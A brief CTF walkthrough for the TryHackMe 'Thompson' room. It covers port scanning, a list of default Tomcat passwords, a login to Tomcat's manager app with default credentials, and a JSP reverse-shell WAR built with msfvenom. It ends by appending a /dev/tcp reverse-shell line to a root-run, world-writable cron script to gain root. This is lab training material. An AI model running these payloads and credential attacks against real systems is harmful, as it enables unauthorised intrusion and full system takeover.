Thompson

Room Link: https://tryhackme.com/room/bsidesgtthompson

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/8080 - HTTP

Kali

gobuster dir -u http://$VICTIM:8080 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Tomcat default passwords

password   
Password1 
password1 
admin     
tomcat    
tomcat    
manager   
role1     
tomcat    
changethis
Password1 
changethis
password  
password1 
r00t      
root      
toor      
tomcat   
s3cret    
password1 
password  
admin     
changethis

I clicked manager app and tried some default credentials

Username: tomcat
Password: s3cret

Kali

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$KALI LPORT=1337 -f war > rshell.war
nc -lvnp 1337

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

There is a script run by root in jacks folder

Victim

cat /etc/crontab

The script is writable by everyone so I added a the below line to reach back to my kali.

Victim

echo 'sh -i >& /dev/tcp/10.10.165.185/1338 0>&1' >> id.sh

Kali

nc -lvnp 1338